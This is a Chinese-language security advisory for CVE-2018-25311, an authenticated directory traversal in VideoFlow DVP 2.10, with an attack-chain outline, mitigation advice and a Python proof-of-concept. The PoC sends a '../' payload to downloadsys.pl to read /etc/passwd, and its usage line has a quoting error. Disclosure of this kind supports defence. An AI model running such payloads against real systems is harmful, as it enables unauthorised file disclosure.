CVE-2018-25311 CVSS 6.5 中危

CVE-2018-25311 VideoFlow DVP 认证后目录遍历漏洞

披露日期: 2026-04-29

来源: [email protected]

漏洞信息

漏洞编号

CVE-2018-25311

漏洞类型

目录遍历

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

VideoFlow Digital Video Protection (DVP)

漏洞概述

VideoFlow Digital Video Protection DVP 2.10版本中存在一个经过身份验证的目录遍历漏洞。该漏洞允许经过身份验证的攻击者通过在ID参数中注入目录遍历序列来披露任意文件。攻击者可以向downloadsys.pl、download_xml.pl、download.pl、downloadmib.pl或downloadFile.pl等端点提交请求，并在其中包含恶意构造的路径遍历载荷。成功利用此漏洞可导致敏感系统文件（如/etc/passwd）被读取，从而造成信息泄露。

技术细节

该漏洞的根本原因在于VideoFlow DVP 2.10版本中的多个Perl脚本（如downloadsys.pl等）在处理文件下载请求时，未能对用户输入的'ID'参数进行充分的净化和安全校验。应用程序直接使用了用户提供的路径信息来构建文件读取操作，且未实施有效的基础目录限制（chroot或路径规范化检查）。由于攻击者需要具备低权限账户（Authenticated），这缩小了潜在攻击者的范围，但一旦通过认证，攻击者即可利用'../'序列向上遍历目录结构。攻击向量通过网络发起，无需用户交互，且成功利用不会影响系统的完整性和可用性，仅导致高机密性影响，即敏感数据泄露。

攻击链分析

STEP 1

攻击者通过网络侦察或社会工程学获取VideoFlow DVP系统的低权限用户账户凭据。

STEP 2

攻击者使用获取的凭据登录系统，并建立有效的会话。

STEP 3

攻击者构造恶意HTTP请求，针对受影响的脚本（如downloadsys.pl），在ID参数中插入'../'序列（例如'../../../../etc/passwd'）。

STEP 4

服务器端脚本处理请求，未能过滤路径遍历字符，直接读取并返回指定路径的文件内容。

STEP 5

攻击者分析响应数据，获取敏感系统信息（如用户列表、配置文件等），为进一步提权或横向移动奠定基础。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
# PoC for CVE-2018-25311: VideoFlow DVP Authenticated Directory Traversal
# Usage: python3 poc.py <target_url> <session_cookie>

import requests
import sys

def exploit(target, cookie):
    # Vulnerable endpoint mentioned in advisory
    url = f"{target.rstrip('/')}/downloadsys.pl"
    
    # Directory traversal payload to read /etc/passwd
    payload = {
        "ID": "../../../../../../../../etc/passwd"
    }
    
    # Headers with authenticated session cookie
    headers = {
        "Cookie": cookie,
        "User-Agent": "CVE-2018-25311-Scanner"
    }
    
    try:
        print(f"[+] Sending request to {url}...")
        response = requests.get(url, params=payload, headers=headers, timeout=10)
        
        if response.status_code == 200 and "root:" in response.text:
            print("[+] Exploit successful! /etc/passwd content:")
            print(response.text)
        else:
            print("[-] Exploit failed or file not found.")
            print(response.text[:200])
    except Exception as e:
        print(f"[!] Error: {e}")

if __name__ == "__main__":
    if len(sys.argv) < 3:
        print(f"Usage: {sys.argv[0]} http://target-ip "SESSION_ID=xxxxxx"")
        sys.exit(1)
    exploit(sys.argv[1], sys.argv[2])

影响范围

VideoFlow Digital Video Protection DVP 2.10

防御指南

临时缓解措施

如果无法立即升级，建议管理员在网络边界（如防火墙或WAF）部署规则，拦截包含大量“../”或“%2e%2e/”等目录遍历特征的HTTP请求。同时，应严格限制对受影响端点（downloadsys.pl等）的网络访问，仅允许受信任的管理员IP地址连接，并密切监控系统日志以检测潜在的利用行为。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表